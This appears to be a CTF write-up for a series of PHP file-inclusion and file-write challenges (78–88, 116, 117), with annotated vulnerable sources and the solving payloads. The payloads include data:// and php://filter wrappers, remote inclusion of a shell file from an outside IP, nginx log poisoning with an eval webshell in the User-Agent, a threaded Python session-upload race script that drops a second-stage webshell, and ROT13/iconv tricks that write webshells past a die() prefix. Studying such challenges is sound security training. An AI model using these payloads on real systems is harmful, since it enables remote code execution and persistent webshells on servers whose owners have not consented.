78
<?php
// CTF challenge 78: the `file` query parameter goes straight into include()
// with no validation at all. Any stream wrapper PHP supports is therefore
// usable -- the writeup below uses data:// (base64-encoded PHP) for code
// execution and php://filter/convert.base64-encode to read flag.php without
// executing it.
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
// No parameter: print this file's own source (the challenge's "view source" mode).
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgKiIpOyA/Pg==
?file=pHp://FilTer/convert.base64-encode/resource=flag.php
79
<?php
// CTF challenge 79: same include() sink, now with a single str_replace() on
// the literal substring "php". str_replace() is case-sensitive and runs once,
// so only an exact lowercase "php" is rewritten (a mixed-case wrapper name
// would pass as-is). The writeup's payload sidesteps it entirely: data:// with
// the PHP base64-encoded means "php" never appears in the parameter.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgKiIpOyA/Pg==
80
<?php
// CTF challenge 80: "php" and "data" are both stripped. Still untouched:
//  - http:// -- remote file inclusion (the writeup hosts shell.txt); this only
//    works if allow_url_include is enabled on the target.
//  - plain local paths -- which is why log poisoning works: the request
//    User-Agent is written to /var/log/nginx/access.log (see notes below),
//    and that path contains neither "php" nor "data".
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
?file=http://49.232.213.200/shell.txt //遠程文件包含,需目標開啟 allow_url_include=On;http:// 不含 php/data,未被過濾
POST:cmd=system("tac *");
//日志包含
?file=/var/log/nginx/access.log //查看到日志格式,發現UA可控
//UA寫入一句話木馬
User-Agent: <?php eval($_POST[a]); ?>
或 <?=eval($_POST[a]); ?>
//注意包含后並不會將一句話木馬打印出來,因為PHP被解析;此處eval前沒有加@忽略錯誤,所以會有警告或報錯
//include含有一句話木馬的log
?file=/var/log/nginx/access.log
a=system("tac f*");
81
<?php
// CTF challenge 81: ":" is now replaced as well, which disables every stream
// wrapper (data://, php://, http://) since all of them need the scheme
// separator. Plain local paths survive, so the access-log poisoning from 80
// still works unchanged (L53 note).
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
日志包含,同上
82
<?php
// CTF challenge 82: "." is replaced too, so any path with an extension
// (including access.log) is broken. What is left is a dot-less, scheme-less
// path to a file the attacker can populate. The Python script below races
// PHP's session upload-progress feature: the PHP_SESSION_UPLOAD_PROGRESS field
// is written into /tmp/sess_<PHPSESSID>, which is then include()d here before
// PHP removes it.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
相比上一題過濾了 . 無法再使用日志包含,需要包含無后綴的文件
//無數次失敗
import io
import os
import threading

import requests
# Challenge instance under attack (trailing slash matters: paths are appended to it).
url = "http://67363ea2-74cc-40df-81c3-3447bff4cd9b.challenge.ctf.show/"
# PHPSESSID value; the reader thread assumes PHP stores it as /tmp/sess_<this value>.
sessionid = "test"
# Body POSTed while the session file is included: the eval($_POST[1]) planted
# there runs this PHP, which drops a second-stage webshell at /var/www/html/2.php.
data = {
    "1": "file_put_contents('/var/www/html/2.php','<?php eval($_POST[2]);?>');",
}
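def write(session):
    """Writer thread: keep POSTing a multipart upload whose
    PHP_SESSION_UPLOAD_PROGRESS field carries the PHP payload, so the server
    keeps (re)creating /tmp/sess_<sessionid> with that payload inside.

    This relies on PHP's default session.upload_progress behaviour (enabled,
    and the progress data is cleaned up as soon as the upload finishes), which
    is why it has to be raced by the reader threads. Loops forever.

    :param session: shared requests session
    """
    payload = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>'}
    cookies = {'PHPSESSID': sessionid}
    while True:
        # FIX: build a fresh BytesIO every iteration. requests reads the file
        # object to EOF, so reusing one instance sent a 0-byte upload on every
        # pass after the first.
        upload = io.BytesIO(b'a' * 1024 * 50)
        session.post(url,
                     data=payload,
                     cookies=cookies,
                     files={'file': ('test.jpg', upload)})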
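def read(session):
    """Reader thread: race the writers by including the session file, then
    probe for the dropped webshell.

    Each pass POSTs `data` (PHP that writes /var/www/html/2.php) to
    ?file=/tmp/sess_<sessionid>. If the include happens while the session file
    still holds the eval() payload, 2.php is created and the following GET
    returns 200; otherwise the status code is printed and the loop continues.

    :param session: shared requests session
    """
    target = url + '?file=/tmp/sess_' + sessionid
    cookies = {'PHPSESSID': sessionid}
    while True:
        session.post(target, data=data, cookies=cookies)
        probe = session.get(url + '2.php')
        if probe.status_code == 200:
            print("+++++++++++done+++++++++++")
            # FIX: exit() only raises SystemExit in *this* thread; the other
            # reader and writer threads kept running forever. Terminate the
            # whole process instead.
            os._exit(0)
        print(probe.status_code)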
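if __name__ == '__main__':
    # Two writers keep re-creating the session file, three readers race to
    # include it before PHP cleans it up. All threads share one Session and are
    # non-daemon: they run until a reader reports success.
    # FIXES vs. the original: the `with requests.session()` block closed the
    # Session as soon as the threads had been *started*, while they were still
    # using it; the threading.Event that was created and set was never consulted
    # (dead code); and requests.session() is the deprecated alias of Session().
    session = requests.Session()
    for _ in range(2):
        threading.Thread(target=write, args=(session,)).start()
    for _ in range(3):
        threading.Thread(target=read, args=(session,)).start()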
以下幾題(83~86)均可用本題腳本,因為多線程,就算有刪除指令,會有進程將數據緊接着寫進去
83
Warning: session_destroy(): Trying to destroy uninitialized session in /var/www/html/index.php on line 14
<?php
// CTF challenge 83: 82 plus an attempt to tear the session down first.
// session_unset()/session_destroy() are called without session_start(); as the
// warning captured above shows ("Trying to destroy uninitialized session")
// they fail and remove nothing, so the upload-progress session file is
// unaffected and the same race script applies.
session_unset();
session_destroy();
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
84
<?php
// CTF challenge 84: 82 plus an explicit wipe of /tmp right before include().
// This is still a race: between the rm and the include() a concurrent upload
// request can recreate /tmp/sess_<id>, which is exactly what the multi-threaded
// writer in the script above does (L109 note). The system() call itself takes
// a fixed string, not user input, so it is not an injection point.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
system("rm -rf /tmp/*");
include($file);
}else{
highlight_file(__FILE__);
}
85
<?php
// CTF challenge 85: 82 plus a content check. Two independent weaknesses:
//  1. Check-then-use: the file is read with file_get_contents(), rejected if
//     it contains "<", and then read a second time by include(). A writer that
//     lands between the two reads gets a clean file past the check and a
//     payload into include() -- the same race script works.
//  2. strpos(...) > 0 treats a "<" at offset 0 as "not found" (strpos returns
//     0 there); the correct test is `!== false`.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
if(file_exists($file)){
$content = file_get_contents($file);
if(strpos($content, "<")>0){
die("error");
}
include($file);
}
}else{
highlight_file(__FILE__);
}
86
<?php
// CTF challenge 86: 82 plus set_include_path() pointed at this script's own
// directory. include_path only affects how *relative* paths are resolved; an
// absolute path such as /tmp/sess_<id> is opened directly, so the 82 race
// script is unchanged. The constant's name is just a taunt.
define('還要秀?', dirname(__FILE__));
set_include_path(還要秀?);
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
87
<?php
// CTF challenge 87: a write primitive instead of an include. Two problems:
//  - The blacklist runs on the raw parameter, but the path is urldecode()d
//    *afterwards*, so a double-URL-encoded "php://filter/..." passes the
//    filter and is decoded into a working wrapper (the writeup's payload).
//  - The "<?php die(...)?>" prefix is meant to neutralise whatever is written;
//    php://filter/write=string.rot13 rotates the whole output, garbling the
//    prefix while a pre-ROT13'd body comes out as real PHP.
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬別秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
?file=php://filter/write=string.rot13/resource=1.php #url編碼兩次
POST:<?php eval($_POST[1]);?> #ROT13編碼一次
//1.php為一句話木馬文件
88
<?php
// CTF challenge 88: case-insensitive regex blacklist covering "php", "." and
// most punctuation, including "=". Not covered: ":", "/", "," and ";", so
// data://text/plain;base64,... is still accepted. The writeup appends "aa" to
// the PHP so the base64 comes out without "=" padding, and the whole parameter
// contains no ".".
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgIHN5c3RlbSgidGFjICoiKTs/PmFh
#<?php system("tac *");?>aa
116
//打開是一個視頻,把視頻下載下來,分解出一張圖片,是文件包含的源碼。
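<?php
// CTF challenge 116 (source transcribed from a frame of the challenge video).
// Blacklist on the raw `file` parameter. Note what it does NOT mention: the
// php:// wrapper and its filters, and plain local paths. The stray whitespace
// around the pattern delimiters is tolerated by PHP and looks like a
// transcription artifact, so it is left as-is.
function filter($x){
if(preg_match(' /http|https|data|input|rot13|base64|string|log|sess/i ' ,$x)){
die( 'too young too simple sometimes native!');
}
}
// FIX: the transcription had isset($_GET['file']?$_GET['file']:"sp2.mp4"),
// which is a parse error ("Cannot use isset() on the result of an expression").
// The intended form is a ternary on isset().
$file=isset($_GET['file'])?$_GET['file']:"sp2.mp4";
header('Content-Type: video/mp4');
filter($file);
// Arbitrary file read: the user-controlled path is read and echoed verbatim
// under a video content type.
echo file_get_contents($file);
?>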
117
<?php
// CTF challenge 117: like 87, a file_put_contents() write primitive with a
// "<?php die();?>" prefix, behind a larger blacklist. highlight_file() runs
// first; error_reporting(0) only silences what follows.
highlight_file(__FILE__);
error_reporting(0);
// Blocks several php://filter converters (utf*, zlib, rot13, base64, string.*)
// but not convert.iconv. The writeup's payload uses
// convert.iconv.UCS-2LE.UCS-2BE, which swaps every pair of bytes in the
// written stream: the 14-byte die() prefix becomes non-PHP noise, and the
// POSTed contents are supplied pre-swapped (`?<hp pvela$(P_SO[T]1;)>?`) so
// they land on disk as `<?php eval($_POST[1]);?>`.
function filter($x){
if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
die('too young too simple sometimes naive!');
}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);
payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php post:contents=?<hp pvela$(P_SO[T]1;)>?